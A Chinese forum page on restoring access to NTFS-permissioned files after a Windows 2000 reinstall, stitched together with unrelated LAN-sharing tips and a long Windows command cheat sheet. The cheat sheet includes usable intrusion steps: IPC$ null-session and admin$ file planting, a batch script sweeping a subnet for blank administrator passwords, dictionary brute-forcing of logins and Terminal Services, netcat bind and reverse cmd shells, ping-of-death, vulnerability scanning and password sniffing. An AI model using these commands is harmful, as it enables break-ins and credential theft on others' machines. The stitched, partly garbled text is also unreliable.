NTFS,Win2k重装后,设置权限的文件真的无法打开了吗

cameo888 2003-08-29 07:40:48
重装系统前,我是设置了某个文件夹的访问权限,即在文件夹属性的安全选项卡上去
掉everyone,添加可访问的用户名。并没有在文件夹属性的常规选项卡的"高级"中
选中“加密内容以便保护数据”复选框。这样不属于EFS加密吧?可以打开该文件夹下的文件吗?我现在仅能打开该文件夹下部分文件,有两个文件无法打开
...全文
62 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
cameo888 2003-08-30
  • 打赏
  • 举报
回复
OK,问题已经解决。幸好不是EFS加密。谢谢各位。
tutuit 2003-08-29
  • 打赏
  • 举报
回复
可以使用,右键点文件或文件夹-》属性-》安全—》高级-》所有权,把所有者改成你自己的帐号就可以了,但是用efs加密过的就不行了。
pigpag 2003-08-29
  • 打赏
  • 举报
回复
安全选项卡->高级...->所有权选项卡->点击Administrators,然后钩上下面的复选框->确定或应用。
cameo888 2003-08-29
  • 打赏
  • 举报
回复
如何夺取?
pigpag 2003-08-29
  • 打赏
  • 举报
回复
夺取所有权就可以访问了。
一、启用guest来宾帐户; 二、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里,“从网络访问此计算机”中加入guest帐户,而“拒绝从网络访问这台计算机”中删除guest帐户; 三、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享(推荐)”前的勾; 四、设置共享文件夹; 五、控制面板→管理工具→本地安全策略→本地策略→安全选项里,把“网络访问:本地帐户的共享和安全模式”设为“仅来宾-本地用户以来宾的身份验证”(可选,此项设置可去除访问时要求输入密码的对话框,也可视情况设为“经典-本地用户以自己的身份验证”); 六、右击“我的电脑”→“属性”→“计算机名”,该选项卡中有没有出现你的局域网工作组名称,如“work”等。然后单击“网络 ID”按钮,开始“网络标识向导”:单击“下一步”,选择“本机是商业网络的一部分,用它连接到其他工作着的计算机”;单击“下一步”,选择“公司使用没有域的网络”;单击“下一步”按钮,然后输入你的局域网的工作组名,如“work”,再次单击“下一步”按钮,最后单击“完成”按钮完成设置。 访问网上邻居时显示:" windows xp系统访问局域网时显示 "WORKGROUP无法访问.您可能没有权限使用网络资源.请与这台服务器的管理员联系以查明您是否有访问权限.此工作组的服务器的列表当前无法使用." 我用的是xp系统 我也遇到过这样的情况,当时也是着急得不轻,后来看到了以下的内容,照着一步步的做了做,真的好了。内容不少,但是仍然希望你能耐住性子,仔细的看看自己属于那种情况,应该会有所收获。 局域网互访 - [ 网络 ] 我也是类似问题。 以前一个局域网10多台机子互访问。安了蕃茄花园v2.3,感觉主题漂亮,桌面壁纸自动换,很爽。访问局域网计算机没问题。可网内其它机子在工作组内能看到我的机子,但打不开。说什么“没有权限”。所有设置都作了如下改动(网上找的),依然无效,何故?但求高手指点。 “网上邻居”无法互访问题解决方法大全 “网上邻居”无法互访的问题实在是太常见了,无论在学校,网吧还是家里多台电脑联机,都有可能遇到网上邻居无法互访的故展。“网上邻居”无法访问的故障多种多样,总结起来基本上有下面的几个: 1,没有共享资源/共享服务未启用。 症状:电脑与电脑间可以Ping通,但无法访问共享资源,在“计算机管理”中查看“本地共享”后会弹出“没有启动服务器服务”的错误对话框。 解决:在控制面板-管理工具-服务中启动Server服务。并设置“启动类型”为“自动”。 2,IP设置有误。 症状:双机之间无法互Ping,连接用的双绞线经过测试没有问题,没有安装防火墙。 解决:检查两台电脑的IP是否处在同一网段,还有子掩码是否相同。 3,WINXP默认设置不正确。 症状:从WIN98/2000/2003上无法访问另一台WINXP的机器。 解决:在“控制面板”中的“用户帐户”启用Guest帐号。然后在运行中输入secpol.msc启动“本地安全策略”。 本地策略 -> 用户权利指派,打开“从网络访问此计算机”,添加Guest帐户 本地策略 -> 安全选项,禁止"帐户:使用空白密码的本地帐户只允许进行控制台登陆"。 另外有时还会遇到另外一种情况:访问XP的时候,登录对话框中的用户名是灰的,始终是Guest用户,不能输入别的用户帐号。 解决:本地策略 -> 安全选项 -> "网络访问:本地帐户的共享和安全模式",修改为"经典-本地用户以自己的身份验证" 4,系统漏洞修补软件修改了安全策略。 症状:在“网上邻居”中可以看到对方的计算机,但是访问共享时却提示“没有权限访问网络” 解决:在开始菜单运行中输入secpol.msc启动“本地安全策略”,本地策略 -> 用户权利分配,打开“拒绝从网络访问这台计算机”,删除guest用户。 5,防火墙规则。 症状:安装了防火墙(包括WINXP系统自带的防火墙),出现无法Ping通,或者是访问共享资源的时候提示"XXX无法访问"、"您可能没有权限使用网络资源"、"请与这台服务器的管理员联系以查明您是否有访问权限"、"找不到网络路径"等类似的提示。 解决:停止防火墙或者添加局域网的访问规则。 WINXP自带的防火墙:打开控制面板 -> 网络和Internet连接 -> Windows防火墙 -> 例外,勾选“文件和打印机共享”。 6,Win2000/XP与Win98互访 症状:Ping命令可以通过,但无法在“网上邻居”中实现互访。 解决:在WIN2000/XP系统中:控制面板 -> 管理工具 -> 计算机管理 -> 本地用户和组 -> 用户,在Guest帐户上点击鼠标右键,选择属性,在常规项里取消
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) 命令大全 1. gpedit.msc-----组策略 2. sndrec32-------录音机    3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用,但在 Windows 98 中却没有集成这一个工具。    4. explorer-------打开资源管理器    5. logoff---------注销命令    6. shutdown-------60秒倒计时关机命令    7. lusrmgr.msc----本机用户和组    8. services.msc---本地服务设置    9. oobe/msoobe /a----检查XP是否激活    10. notepad--------打开记事本    11. cleanmgr-------垃圾整理    12. net start messenger----开始信使服务    13. compmgmt.msc---计算机管理    14. net stop messenger-----停止信使服务    15. conf-----------启动netmeeting    16. dvdplay--------DVD播放器    17. charmap--------启动字符映射表    18. diskmgmt.msc---磁盘管理实用程序    19. calc-----------启动计算器    20. dfrg.msc-------磁盘碎片整理程序    21. chkdsk.exe-----Chkdsk磁盘检查    22. devmgmt.msc--- 设备管理器    23. regsvr32 /u *.dll----停止dll文件运行    24. drwtsn32------ 系统医生    25. rononce -p----15秒关机    26. dxdiag---------检查DirectX信息    27. regedt32-------注册表编辑器    28. Msconfig.exe---系统配置实用程序    29. rsop.msc-------组策略结果集    30. mem.exe--------显示内存使用情况    31. regedit.exe----注册表    32. winchat--------XP自带局域网聊天    33. progman--------程序管理器    34. winmsd---------系统信息    35. perfmon.msc----计算机性能监测程序    36. winver---------检查Windows版本    37. sfc /scannow-----扫描错误并复原    38. taskmgr-----任务管理器(2000/xp/2003)    39. regsvr32 /u *.dll----停止dll文件运行    40. wmimgmt.msc----打开windows管理体系结构(WMI)    41. wupdmgr--------windows更新程序    42. wscript--------windows脚本宿主设置    43. write----------写字板    45. wiaacmgr-------扫描仪和照相机向导    46. winchat--------XP自带局域网聊天    49. mplayer2-------简易widnows media player    50. mspaint--------画图板    51. mstsc----------远程桌面连接    53. magnify--------放大镜实用程序    54. mmc------------打开控制台    55. mobsync--------同步命令    57. iexpress-------木马捆绑工具,系统自带    58. fsmgmt.msc-----共享文件夹管理器    59. utilman--------辅助工具管理器    61. dcomcnfg-------打开系统组件服务    62. ddeshare-------打开DDE共享设置    63. osk------------打开屏幕键盘    64. odbcad32-------ODBC数据源管理器    65. oobe/msoobe /a----检查XP是否激活    66. cmd.exe--------CMD命令提示符    67. regsvr32 /u zipfldr.dll------取消ZIP支持    68. ntbackup-------系统备份和还原    69. narrator-------屏幕“讲述人”    70. ntmsmgr.msc----移动存储管理器    71. ntmsoprq.msc---移动存储管理员操作请求    72. netstat -an----(TC)命令检查接口    73. syncapp--------创建一个公文包    74. sysedit--------系统配置编辑器    75. sigverif-------文件签名验证程序    76. ciadv.msc------索引服务程序    77. shrpubw--------创建共享文件夹    78. secpol.msc-----本地安全策略    79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码    80. services.msc---本地服务设置    81. Sndvol32-------音量控制程序    82. sfc.exe--------系统文件检查器    83. sfc /scannow---windows文件保护    84. ciadv.msc------索引服务程序    85. tourstart------xp简介(安装完成后出现的漫游xp程序)    86. taskmgr--------任务管理器    87. eventvwr-------事件查看器    88. eudcedit-------造字程序    89. compmgmt.msc---计算机管理    90. packager-------对象包装程序    91. perfmon.msc----计算机性能监测程序    92. charmap--------启动字符映射表    93. cliconfg-------SQL SERVER 客户端网络实用程序    94. Clipbrd--------剪贴板查看器    95. conf-----------启动netmeeting    96. certmgr.msc----证书管理实用程序 操作详解 net use ipipc$ " " /user:" " 建立IPC空链接    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:    net use h: ipc$ 登陆后映射对方C:到本地为H:    net use ipipc$ /del 删除IPC链接    net use h: /del 删除映射对方到本地的为H:的映射    net user 用户名 密码 /add 建立用户    net user guest /active:yes 激活guest用户    net user 查看有哪些用户    net user 帐户名 查看帐户的属性    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限    net start 查看开启了哪些服务    net start 服务名 开启服务;(如:net start telnet, net start schedule)    net stop 服务名 停止某服务    net time 目标ip 查看对方时间    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息    net view 查看本地局域网内开启了哪些共享    net view ip 查看对方局域网内开启了哪些共享    net config 显示系统网络设置    net logoff 断开连接的共享    net pause 服务名 暂停某服务    net send ip "文本信息" 向对方发信息    net ver 局域网内正在使用的网络连接类型和信息    net share 查看本地开启的共享    net share ipc$ 开启ipc$共享    net share ipc$ /del 删除ipc$共享    net share c$ /del 删除C:共享    net user guest 12345 用guest用户登陆后用将密码改为12345    net password 密码 更改系统登陆密码    netstat -a 查看开启了哪些端口,常用netstat -an    netstat -n 查看端口的网络连接情况,常用netstat -an    netstat -v 查看正在进行的工作    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况    netstat -s 查看正在使用的所有协议使用情况    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名   tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。   ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)   ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件   del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令    at id号 开启已注册的某个计划任务    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止    at id号 /delete 停止某个已注册的计划任务   at 查看所有的计划任务    at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机   finger username @host 查看最近有哪些用户登陆    telnet ip 端口 远和登陆服务器,默认端口为23    open ip 连接到IP(属telnet登陆后的命令)    telnet 在本机上直接键入telnet 将进入本机的telnet    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下    copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件    copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件   用参数/e才可连目录下的子目录一起复制到目标地址下。    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exec:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送    tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令    mem 查看cpu使用情况    attrib 文件名(目录名) 查看某文件(目录)的属性    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间    set 指定环境变量名称=要指派给变量的字符 设置环境变量    set 显示当前所有的环境变量    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量    pause 暂停批处理程序,并显示出:请按任意键继续....    if 在批处理程序中执行条件处理(更多说明见if命令及变量)    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)    call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)   for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置    echo 信息 在屏幕上显示出信息    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello    find 文件名 查找某文件    title 标题名字 更改CMD窗口标题名字    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )    ver 在DOS窗口下显示版本信息    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS,例:Format D: /FS:NTFS    md 目录名 创建目录    replace 源文件 要替换文件的目录 替换文件    ren 原文件名 新文件名 重命名文件名    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称    type 文件名 显示文本文件的内容    more 文件名 逐屏显示输出文件    doskey 要锁定的命令=字符    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=    taskmgr 调出任务管理器    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe   path 路径可执行文件文件名 为可执行文件设置一个路径。    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;    regedit /e 注册表文件名 导出注册表    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。    cacls 文件名 查看文件的访问用户权限列表    REM 文本内容 在批处理文件中添加注解    netsh 查看或更改本地网络配置情况    IIS服务命令    iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)    iisreset /start或stop 启动(停止)所有Internet服务    iisreset /restart 停止然后重新启动所有Internet服务    iisreset /status 显示所有Internet服务状态    iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动    iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机   iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务    iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。    FTP 命令:(后面有详细说明内容)    ftp的命令行格式为:   ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。    -d 使用调试方式。    -n 限制ftp的自动登录,即不使用.netrc文件。    -g 取消全局文件名。    help [命令] 或 ?[命令] 查看命令说明    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.    pwd 列出当前远端主机目录    put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中    get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中    mget [remote-files] 从远端主机接收一批文件至本地主机    mput local-files 将本地主机中一批文件传送至远端主机    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件    ascii 设定以ASCII方式传送文件(缺省值)    bin 或 image 设定以二进制方式传送文件    bell 每完成一次文件传送,报警提示    cdup 返回上一级目录    close 中断与远程服务器的ftp会话(与open对应)    open host[port] 建立指定ftp服务器连接,可指定连接端口    delete 删除远端主机中的文件    mdelete [remote-files] 删除一批文件    mkdir directory-name 在远端主机中建立目录    rename [from] [to] 改变远端主机中的文件名    rmdir directory-name 删除远端主机中的目录    status 显示当前FTP的状态    system 显示远端主机系统类型    user user-name [password] [account] 重新以别的用户名登录远端主机    open host [port] 重新建立一个新的连接    prompt 交互提示模式    macdef 定义宏命令    lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   chmod 改变远端主机的文件权限    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母   cd remote-dir 进入远程主机目录    cdup 进入远程主机目录的父目录   ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip   #5    MYSQL 命令    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。   (例:mysql -h110.110.110.110 -Uroot -P123456   注:u与root可以不用加空格,其它也一样)    exit 退出MYSQL    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码    grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)   show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。   use mysql;    show tables; 显示库中的数据表    describe 表名; 显示数据表的结构    create database 库名; 建库   use 库名;    create table 表名 (字段设定列表); 建表    drop database 库名;    drop table 表名; 删库和删表    delete from 表名; 将表中记录清空    select * from 表名; 显示表中的记录    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件文件名任取,打开看看你会有新发现。    win2003系统下新增命令(实用部份):    shutdown /参数 关闭或重启本地或远程主机。   参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。   例:shutdown /r /t 0 立即重启本地主机(无延时)   taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。   参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。   参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。    Linux系统下基本命令 注:要区分大小写    uname 显示版本信息(同win2K的 ver)    dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)   pwd 查询当前所在的目录位置   cd cd ..回到上一层目录,注意cd 与..之间有空格。 cd /返回到根目录。   cat 文件名 查看文件内容   cat >abc.txt 往abc.txt文件中写上内容。   more 文件名 以一页一页的方式显示一个文本文件。   cp 复制文件    mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录    mkdir 目录名 建立目录    rmdir 删除子目录,目录内没有文档。    chmod 设定档案或目录的存取权限    grep 在档案中查找字符串    diff 档案文件比较    find 档案搜寻    date 现在的日期、时间    who 查询目前和你使用同一台机器的人以及Login时间地点    w 查询目前上机者的详细资料    whoami 查看自己的帐号名称    groups 查看某人的Group    passwd 更改密码    history 查看自己下过的命令    ps 显示进程状态    kill 停止某进程    gcc 黑客通常用它来编译C语言写的文件    su 权限转换为指定使用者    telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。    ftp ftp连接上某服务器(同win2K)    批处理命令与变量    1:for命令及变量 基本格式    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。    批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2,user为%3    (set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开   command_parameters:为特定命令指定参数或命令行开关   IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。    用法举例:   @echo off   echo 用法格式:test.bat *.*.* > test.txt   for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt    存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。   /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。   @echo off   echo 用法格式:ok.bat ip   FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200   存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。    七:   2:if命令及变量 基本格式   IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。   例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。   0 指发现并成功执行(真);1 指没有发现、没执行(假)。   IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。   例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")   IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。   例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。   IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。当有del命令时需把del命令全部内容用括起来,因为del命令要单独一行时才能执行,用上后就等于是单独一行了;例如:“if exist test.txt. else echo test.txt.missing ”,注意命令中的“.”   系统外部命令   注:系统外部命令(均需下载相关工具)   瑞士军刀:nc.exe    参数说明:   -h 查看帮助信息   -d 后台模式   -e prog程序重定向,一但连接就执行[危险]   -i secs延时的间隔   -l 监听模式,用于入站连接   -L 监听模式,连接天闭后仍然继续监听,直到CTR+C   -n IP地址,不能用域名   -o film记录16进制的传输   -p[空格]端口 本地端口号   -r 随机本地及远程端口   -t 使用Telnet交互方式   -u UDP模式   -v 详细输出,用-vv将更详细   -w数字 timeout延时间隔   -z 将输入,输出关掉(用于扫锚时)   基本用法:   nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口   nc -l -p 80 开启本机的TCP 80端口并监听   nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口   nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口   nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口   高级用法:   nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止   nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt   nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用   本机上用: nc -l -p 本机端口   在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K   nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙   本机上用:nc -d -l -p 本机端口 存放文件的路径及名称 传送文件到对方主机   备 注:   | 管道命令    重定向命令。“<;”,例如:tlntadmn > d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中   >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。   如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。   八:   扫描工具:xscan.exe   基本格式   xscan -host [-] [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息   xscan -file [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息   检测项目   -active 检测主机是否存活   -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)   -port 检测常用服务的端口状态   -ftp 检测FTP弱口令   -pub 检测FTP服务匿名用户写权限   -pop3 检测POP3-Server弱口令   -smtp 检测SMTP-Server漏洞   -sql 检测SQL-Server弱口令   -smb 检测NT-Server弱口令   -iis 检测IIS编码/解码漏洞   -cgi 检测CGI漏洞   -nasl 加载Nessus攻击脚本   -all 检测以上所有项目   其它选项   -i 适配器编号 设置网络适配器,可通过"-l"参数获取   -l 显示所有网络适配器   -v 显示详细扫描进度   -p 跳过没有响应的主机   -o 跳过没有检测到开放端口的主机   -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量,默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)   用法示例   xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机   xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机   xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机   九:   命令行方式嗅探器: xsniff.exe   可捕获局域网内FTP/SMTP/POP3/HTTP协议密码   参数说明   -tcp 输出TCP数据报   -udp 输出UDP数据报   -icmp 输出ICMP数据报   -pass 过滤密码信息   -hide 后台运行   -host 解析主机名   -addr IP地址 过滤IP地址   -port 端口 过滤端口   -log 文件名 将输出保存到文件   -asc 以ASCII形式输出   -hex 以16进制形式输出   用法示例   xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中   xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出   终端服务密码破解: tscrack.exe   参数说明   -h 显示使用帮助   -v 显示版本信息   -s 在屏幕上打出解密能力   -b 密码错误时发出的声音   -t 同是发出多个连接(多线程)   -N Prevent System Log entries on targeted server   -U 卸载移除tscrack组件   -f 使用-f后面的密码   -F 间隔时间(频率)   -l 使用-l后面的用户名   -w 使用-w后面的密码字典   -p 使用-p后面的密码   -D 登录主页面   用法示例   tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码   tscrack 192.168.0.1 -l administrator 